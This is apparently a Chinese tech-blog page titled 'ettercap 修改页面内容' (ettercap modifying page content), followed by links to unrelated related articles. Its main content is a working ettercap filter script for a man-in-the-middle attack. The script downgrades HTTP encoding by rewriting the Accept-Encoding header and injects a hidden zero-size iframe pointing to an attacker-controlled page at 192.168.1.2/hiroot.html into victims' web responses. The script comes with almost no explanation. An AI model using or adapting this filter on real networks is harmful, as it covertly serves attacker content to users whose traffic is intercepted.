ettercap 修改页面内容

简介: if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.dst == 80 || tcp.dst == 8080) { #.
    if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.dst == 80 || tcp.dst == 8080) { 
      
     #...and if it contains an Accept-Encoding header... 
      
     if (search(DATA.data, "Accept-Encoding")) { 
      
     #...remove any Encoding (make sure we are using plain text) 
      
     replace("Accept-Encoding", "Accept-Nothing!"); 
      
     } 
      
    } 
      
    #--Inject Iframe-- 
      
    if (ip.proto == TCP && ip.dst != '192.168.1.2' && tcp.src == 80 || tcp.src == 8080) { 
      
     if (search(DATA.data, "<body>")){ 
      
     #Replace it with the body tag and an iframe to our attacking webpage 
      
     replace("<body>","<body><iframe src='http://192.168.1.2/hiroot.html' width=0 height=0 />"); 
      
     msg("iframe injected after <body>\n"); 
      
     } 
      
     if (search(DATA.data, "<BODY>")){ 
      
     replace("<BODY>","<BODY><IFRAME SRC='http://192.168.1.2/hiroot.html' width=0 height=0 />"); 
      
     msg("iframe injected after <BODY>\n"); 
      
     } 
      
    } 


目录
相关文章
|
3月前
|
Apache
HAProxy的高级配置选项-自定义错误跳转案例
这篇文章介绍了HAProxy的高级配置选项,特别是如何实现自定义错误页面跳转的功能,并通过实战案例展示了在出现特定HTTP错误状态码时如何重定向到指定的错误页面。
86 5
|
7月前
markdown增加目录索引,实现点击目录跳转到对应的内容目录标题
markdown增加目录索引,实现点击目录跳转到对应的内容目录标题
380 0
|
7月前
|
前端开发 JavaScript
前端用原生js编辑文件内容→创建生成文件(格式可以自定义)→下载文件
前端用原生js编辑文件内容→创建生成文件(格式可以自定义)→下载文件
|
数据安全/隐私保护
【解密】PDF文档忘记编辑密码 照样编辑
【解密】PDF文档忘记编辑密码 照样编辑
99 0
C#设置并获取粘贴板内容
C#设置并获取粘贴板内容
|
安全 程序员
网站打开被提示该内容被禁止访问的原因分析
最近手机短信和邮箱总是收到阿里云的违规URL通知,意思是网站存在违规URL地址,导致被短信或邮箱通知,关键问题是天天给我发这个通知,实在太烦了,集团网站的领导打电话让我抓紧处理,我可马虎不得就抓紧登录阿里云查看下具体的通知内容,显示如下:
749 0
网站打开被提示该内容被禁止访问的原因分析
|
SQL 弹性计算 安全
打开网站提示“该内容被禁止访问”该怎么处理
很多客户的网站被拦截并提示:“该内容被禁止访问”,大多数客户使用的都是阿里云的虚拟主机以及ECS服务器,最近发生这种问题的网站也越来越多,这几天刚解决完一个客户网站被阿里云:违规URL屏蔽访问处理通知并拦截,经过朋友介绍找到我们SINE安全公司。
663 0
打开网站提示“该内容被禁止访问”该怎么处理